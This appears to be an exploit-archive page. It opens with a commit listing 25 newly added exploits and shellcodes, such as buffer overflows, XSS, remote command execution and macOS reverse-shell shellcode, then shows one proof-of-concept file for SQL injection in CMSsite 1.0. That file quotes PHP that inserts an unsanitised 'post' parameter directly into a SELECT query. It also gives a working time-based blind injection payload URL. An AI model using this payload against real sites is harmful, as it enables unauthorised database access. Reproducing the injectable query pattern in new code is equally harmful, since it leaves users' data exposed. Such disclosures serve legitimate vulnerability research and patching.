cd868436ff
25 changes to exploits/shellcodes Realterm Serial Terminal 2.0.0.70 - Denial of Service Realterm Serial Terminal 2.0.0.70 - Local Buffer Overflow (SEH) NBMonitor 1.6.5.0 - 'Key' Denial of Service (PoC) Oracle Java Runtime Environment - Heap Out-of-Bounds Read During OTF Font Rendering in glyph_CloseContour Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in OpenTypeLayoutEngine::adjustGlyphPositions Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in ExtractBitMap_blocClass Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in AlternateSubstitutionSubtable::process mIRC < 7.55 - Remote Command Execution Using Argument Injection Through Custom URI Protocol Handlers qdPM 9.1 - 'type' Cross-Site Scripting qdPM 9.1 - 'search[keywords]' Cross-Site Scripting Master IP CAM 01 3.3.4.2103 - Remote Command Execution MISP 2.4.97 - SQL Command Execution via Command Injection in STIX Module CMSsite 1.0 - 'post' SQL Injection M/Monit 3.7.2 - Privilege Escalation Webiness Inventory 2.3 - 'ProductModel' Arbitrary File Upload Apache CouchDB 2.3.0 - Cross-Site Scripting ArangoDB Community Edition 3.4.2-1 - Cross-Site Scripting Comodo Dome Firewall 2.7.0 - Cross-Site Scripting Zoho ManageEngine ServiceDesk Plus (SDP) < 10.0 build 10012 - Arbitrary File Upload WordPress Plugin WooCommerce - GloBee (cryptocurrency) Payment Gateway 1.1.1 - Payment Bypass / Unauthorized Order Status Spoofing macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (119 bytes) macOS - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (129 bytes) macOS - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes) macOS - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (123 bytes) macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes)
24 lines
No EOL
673 B
Text
24 lines
No EOL
673 B
Text
# Exploit Title: CMSsite 1.0 - 'post' SQL Injection
|
|
|
|
# Exploit Author: Mr Winst0n
|
|
# Author E-mail: manamtabeshekan[@]gmail[.]com
|
|
# Discovery Date: February 17, 2019
|
|
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
|
|
# Software Link : https://github.com/VictorAlagwu/CMSsite/archive/master.zip
|
|
# Tested Version: 1.0
|
|
# Tested on: Kali linux, Windows 8.1
|
|
|
|
|
|
# PoC:
|
|
# Vulnerable File: post.php
|
|
# Vulnerable Parameter : post
|
|
|
|
if (isset($_GET['post'])) {
|
|
$post = $_GET['post'];
|
|
}
|
|
$query = "SELECT * FROM posts WHERE post_id=$post";
|
|
$run_query = mysqli_query($con, $query);
|
|
|
|
|
|
|
|
# Payload: http://localhost/CMSsite/post.php?post=1%20and%20(sleep(10)) |